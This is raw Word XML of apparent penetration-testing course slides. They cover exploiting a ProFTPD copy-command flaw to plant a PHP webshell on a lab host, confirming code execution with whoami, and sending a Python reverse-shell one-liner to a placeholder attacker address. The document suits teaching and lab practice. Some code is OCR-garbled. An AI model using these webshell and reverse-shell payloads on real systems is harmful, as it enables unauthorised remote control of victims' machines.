cCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA/AIAAAAA&#10;" filled="f" stroked="f">
                        <v:textbox inset="0,0,0,0">
                          <w:txbxContent>
                            <w:p w14:paraId="558D3902" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                              <w:r>
                                <w:rPr>
                                  <w:sz w:val="38"/>
                                </w:rPr>
                                <w:t xml:space="preserve">[GCC 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>
              <w:rPr>
                <w:sz w:val="42"/>
              </w:rPr>
              <w:t>Python 3.6.5 (default, May 11 2018, 13: 30: 17)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25603D00" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="right" w:pos="16305"/>
              </w:tabs>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="50"/>
              </w:rPr>
              <w:t xml:space="preserve">Type </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6460543A" wp14:editId="5E8C1068">
                  <wp:extent cx="123825" cy="9525"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="235220" name="Picture 2352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220" name="Picture 235220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0"/>
              </w:rPr>
              <w:t xml:space="preserve">"help", "copyright", "credits" </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E5E4FBB" wp14:editId="43258CA1">
                  <wp:extent cx="9525" cy="9525"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="235515" name="Picture 2355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515" name="Picture 235515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0"/>
              </w:rPr>
              <w:t xml:space="preserve">or </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1290D236" wp14:editId="58DD0D4D">
                  <wp:extent cx="66675" cy="9525"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="235981" name="Picture 2359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981" name="Picture 235981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" cy="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0"/>
              </w:rPr>
              <w:t xml:space="preserve">"license" for more </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="335418D7" wp14:editId="3C49D017">
                  <wp:extent cx="85725" cy="9525"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="235602" name="Picture 2356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602" name="Picture 235602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" cy="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0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76C0CFFA" wp14:editId="5DF7B0EA">
                  <wp:extent cx="133350" cy="9525"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="235356" name="Picture 2353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356" name="Picture 235356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0"/>
              </w:rPr>
              <w:t>information.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="024AEE08" wp14:editId="0F9A6766">
                  <wp:extent cx="1619250" cy="266700"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="236060" name="Picture 2360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060" name="Picture 236060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10F5A6" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="99"/>
              <w:ind w:left="765"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="317D7A44" wp14:editId="35C854C0">
                  <wp:extent cx="9867900" cy="257175"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="340822" name="Picture 3408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822" name="Picture 340822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790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ACDA8A" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="15"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="46"/>
              </w:rPr>
              <w:t>&gt;&gt;&gt; requests . get( "http://192.168.229.105/anything.php") . text</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B48B614" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="right" w:pos="16305"/>
              </w:tabs>
              <w:spacing w:after="0"/>
            </w:pP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0" wp14:anchorId="61681F9E" wp14:editId="7291D061">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>5314950</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>226386</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="1276350" cy="161925"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapSquare wrapText="bothSides"/>
                  <wp:docPr id="235961" name="Picture 2359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961" name="Picture 235961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40"/>
              </w:rPr>
              <w:t>'proftpd: 172.17. e. 1: 38434: SITE cpto /tmp/www-data\n'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5EF40D3A" wp14:editId="53AC4ACD">
                  <wp:extent cx="1228725" cy="200025"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="235942" name="Picture 2359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942" name="Picture 235942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3BE876C" wp14:editId="0F5DF1C2">
                  <wp:extent cx="1628775" cy="200025"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="236007" name="Picture 2360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007" name="Picture 236007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0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3AB4E410" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="542" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>See how the full command is visible?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489E1AEB" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="3" w:line="264" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:t>The result of whoami just follows after "=/tmp" , like the PHP code did</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="221069CF" wp14:editId="6AB7E4DE">
            <wp:extent cx="790575" cy="219075"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="340828" name="Picture 3408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28" name="Picture 340828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92CB" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="3" w:line="264" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The output of the whoami command is www-data!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BB6564" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="52"/>
        <w:ind w:left="430" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="70"/>
        </w:rPr>
        <w:t>Now we understand how the exploit works.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072D79AF" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="282" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>We've seen a Python script do it wrong, and a Metasploit module do it right</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A1E592" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="178" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>Why not write a Python 3 script, that incorporates all the best parts?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF0F851" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="308" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>Correct inputs, communicative output, exception handling...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26731305" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="1414" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:t>The command &amp; control should be as flexible and easy as possible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AD6742" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="15612" w:right="-510"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2BD3FB1B" wp14:editId="7E550835">
            <wp:extent cx="1363980" cy="1036320"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="236751" name="Picture 236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51" name="Picture 23675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0A8B" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="76"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Leverage an exploit to get a reverse shell!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53245FD8" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="3" w:line="264" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:t>The best form of control is a reverse shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357DCA25" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="402" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:t xml:space="preserve">Since you have a form of Remote Code Execution (RCE), you can have the victim machine connect back </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:t>to you.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C0BDC4" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="162" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>With a reverse shell, you interact with a command-line actively on the box.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3CD741" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="298" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:t>This can be accomplished with many different languages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1AA44B" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="494"/>
        <w:ind w:left="1710"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="54"/>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t>http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1D9640" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="15540" w:right="-510"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F28CB72" wp14:editId="7B11A75B">
            <wp:extent cx="1409700" cy="1066800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="237273" name="Picture 237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73" name="Picture 23727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209F" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="4"/>
        <w:ind w:left="445" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="72"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>In Python, this is accomplished with two modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0362218C" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="184" w:line="264" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:t>You have connected with a remote host with the socket module before...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66ADAAA9" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="403" w:line="264" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:t>And you have heard of the os module!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F78F514" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="4" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>For a Python reverse shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5ED861" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="1530" w:right="-510"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F4E512E" wp14:editId="2A8D4D1F">
            <wp:extent cx="10306050" cy="2733675"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="340830" name="Picture 3408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30" name="Picture 340830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03060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F275" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="3"/>
        <w:ind w:left="430" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="74"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Basic source code for a Python reverse shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E253797" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="17"/>
        <w:ind w:left="300" w:right="-225"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09D45809" wp14:editId="32420678">
            <wp:extent cx="10906125" cy="3476625"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="340832" name="Picture 3408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32" name="Picture 340832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09061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6177" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="384" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>Remember, you connect back to your attacker machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F1E242" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="3" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>Duplicating the file descriptors, 0, 1, and &amp; 2 make the connection interactive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B81B127" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="3"/>
        <w:ind w:left="430" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="70"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Often t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="70"/>
        </w:rPr>
        <w:t>imes this is minified.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29760155" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="315" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:t>On cheatsheets you will see this compressed to just one long line.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1DDD64" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="3278"/>
          <w:tab w:val="center" w:pos="14048"/>
        </w:tabs>
        <w:spacing w:after="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="46"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">python -c ' import os, socket; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="46"/>
        </w:rPr>
        <w:tab/>
        <w:t>("YOUR . HOST .IP.ADDRESS",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C3120E" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="234" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="1470" w:right="2595" w:firstLine="795"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:t>.dup2(s.fi1eno(), 0);os.dup2(s.fi1eno(), 1);os.dup2(s.fi1eno(), . system( " /bin/sh") '</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01987CEE" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="268" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:t>This is so you can easily copy and paste it in your RCE vector!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FD61C5" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="5" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:t>Remember, you'll need to set up a listener to catch the reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009C9BF6" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="300" w:right="-510"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29FF0216" wp14:editId="36FFCD53">
            <wp:extent cx="11087100" cy="1552575"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="340836" name="Picture 3408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36" name="Picture 340836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DFB2" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="4"/>
        <w:ind w:left="445" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="72"/>
        </w:rPr>
        <w:t>Execute this with the RCE attack vector:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15ED7367" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="164" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:t>This payload has a lot of special characters...</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:vertAnchor="text" w:tblpX="285" w:tblpY="915"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="16605" w:type="dxa"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="84" w:type="dxa"/>
          <w:left w:w="0" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="405" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="16605"/>
      </w:tblGrid>
      <w:tr w:rsidR="007A5F0C" w14:paraId="3B11A219" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="4935"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1660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5170FD30" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="27" w:line="365" w:lineRule="auto"/>
              <w:ind w:left="165" w:right="11175" w:hanging="15"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="42"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">#!/usr/bin/env python3 import </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="42"/>
              </w:rPr>
              <w:t>socket, requests</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76ADF68F" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="150"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="38"/>
              </w:rPr>
              <w:t># Create a socket object and connect to FTP service</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AD8C57D" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="264" w:line="216" w:lineRule="auto"/>
              <w:ind w:left="150" w:right="2085"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
              </w:rPr>
              <w:t># With the socket object, send CPFR and CPTO commands to create a PHP webshell . # Have the webshell read from a GET variable, and send along your reverse shell!</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="391CF180" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0" w:line="216" w:lineRule="auto"/>
              <w:ind w:left="180"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="42"/>
              </w:rPr>
              <w:t>requests .get("http://192</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="42"/>
              </w:rPr>
              <w:t xml:space="preserve">.168.229.le5/rce.php?c=python -c 'import os, soc ket ; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="42"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve">ket . socket( ) ,•s . connect( ( </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="42"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve">. ATTACKER . IP . ADDRESS \ " , </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="42"/>
              </w:rPr>
              <w:t>seei) ) ,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="42"/>
              </w:rPr>
              <w:t>•os .dup2(s. fileno(),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="266991F8" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="-21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E74BFFF" wp14:editId="2FF6611F">
                      <wp:extent cx="10382250" cy="1019175"/>
                      <wp:effectExtent l="0" t="0" r="0" b="0"/>
                      <wp:docPr id="338456" name="Group 3384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382250" cy="1019175"/>
                                <a:chOff x="0" y="0"/>
                                <a:chExt cx="10382250" cy="10191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40838" name="Picture 340838"/>
                                <pic:cNvPicPr/>
                              </pic:nvPicPr>
                              <pic:blipFill>
                                <a:blip r:embed="rId18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8575"/>
                                  <a:ext cx="10382250" cy="990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1063" name="Rectangle 251063"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="371475" y="0"/>
